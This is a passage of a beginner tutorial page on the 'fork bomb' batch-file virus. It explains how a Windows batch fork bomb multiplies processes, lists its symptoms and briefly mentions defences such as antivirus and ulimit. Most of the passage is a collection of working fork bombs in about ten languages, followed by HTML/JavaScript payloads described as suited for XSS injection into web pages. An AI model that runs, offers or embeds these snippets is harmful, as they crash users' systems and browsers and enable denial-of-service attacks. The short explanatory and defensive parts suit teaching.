The above is a shorter alternative code. To better understand how the Fork Bomb Batch File virus works let us change the code so that you can understand from a beginner level what the batch file is doing. Note, this new code does EXACTLY the same thing as the code above just beginner level code for us to understand:

The Fork Bomb Batch File Virus Explained Step by Step (How does it work?)

:thestart
start %0
goto thestart

1) The first line creates a label named :thestart as you already know a label in a batch file is a point in the batch file that once a goto thestart  would jump batch file execution to that label name (line).

2) The second line start %0 runs another copy (process) of itself (RUNME.BAT) note that this process is another copy in memory doing the exact same thing. Because %0 in a batch file specifies the file name of where %0 is used, in this case RUNME.BAT

3) The third and last line, goto thestart directs execution of the batch file to the specified label or line in the batch file (infinite loop with no exit). In this case execution of the current process of RUNME.BAT will go to line 1 again and then load ANOTHER process of RUNME.BAT in memory and do this process exponentially and, infinitely, or until memory resources overload and system crashes.

Symptoms after execution of Fork Bomb Batch File Virus code: (dependant on system resources)

  • Machine will be sluggish at first.
  • Machine might slow down.
  • Machine might halt.
  • Machine might restart.
  • The environment (sandbox) your running in (if any) will terminate or restart.

Illustration of Fork Bomb Batch File Virus

Fork Bomb Batch File Virus Illustration: Every child becomes a parent exponentially wasting memory.

Fork Bomb Batch File Virus Illustration: Every child becomes a parent exponentially wasting memory.

Fork Bomb Batch File Virus runs in windows with task manager loaded

Fork Bomb Batch File Virus runs in windows with task manager loaded

 

Every program doubling itself is a form of exponential growth. After one iteration of the loop, two programs (21) are created. Another cycle, each of those two create another two for a total of four (22). Then after 10 iterations we have 1024 (210) instances of our little batch file. After 100 iterations we have 2100 = 1.267 nonillion, a number so big you don’t even know what ‘nonillion’ is (It’s 1030).

The first instance will likely not even complete 50 iterations before the system grinds to a halt and crashes. For such a simple script, each individual iteration would hardly take a few milliseconds, so the first few iterations complete very quickly and soon it becomes more than what the computer can handle.

Is there a way to protect against fork bombs? Yes.

Any antivirus would be able to scan this suspicious executable file and warn the user before execution. As a fork bomb’s mode of operation is entirely dependent on being able to create new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit -u 30 would limit the affected user to a maximum of thirty owned processes.

Tap the toggle below if you’re interested in checking out the code for fork bomb in other common languages/scripts.

Bash

 :(){ :|:& };:

The trick here is that : is a function name — otherwise it is identical to:

 bomb() { bomb | bomb & }; bomb

Same as above, but encoded into a standalone shell script as opposed to a shell function:

#!/bin/bash
./$0|./$0&

Windows Batch File

:TOP
 start "" %0
 goto TOP

The same as above, but shorter:

%0|%0

The same as above, but done in command line using ^ to escape specials:

echo  %0^|%0  > forkbomb.bat
forkbomb.bat

Perl

An inline shell example using the Perl interpreter:

perl -e "fork while fork" &

Python

 import os
 while 1:
     os.fork()

Java

public class ForkBomb
{
  public static void main(String[] args)
  {
    while(true)
    {
      Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
    }
  }
}

Javascript

function bomb() {
  setTimeout(function() {
    for (;;) {
      bomb();
    }
  }, 0);
}

Other JavaScript

while (true) {   var w = window.open();   w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); }

The following version is easier for injection (XSS):

<a href="#" onload="function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }">XSS fork bomb</a>
And the following is simply a more aggressive version of the above:
<script> setInterval(function() {   var w = window.open();   w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); }, 10); </script>

C

#include <unistd.h>

int main(void)
{
    while(1) {
      fork(); /* malloc can be used in order to increase the data usage */
    }
}

Assembly (Linux running on IA-32)

section .text
    global _start
    
_start:
    mov eax,2 ;System call for forking
    int 0x80  ;Call kernel
    jmp _start

PowerShell

while($true) { 
    Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
    Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';}

Related Videos:

Related Links:

What is a Batch file

Coding Autorun.inf Script Virus

What is a Batch file?

Introduction to Batch File Viruses

Protect Your Site from Malicious Requests

Wikipedia on Fork Bombs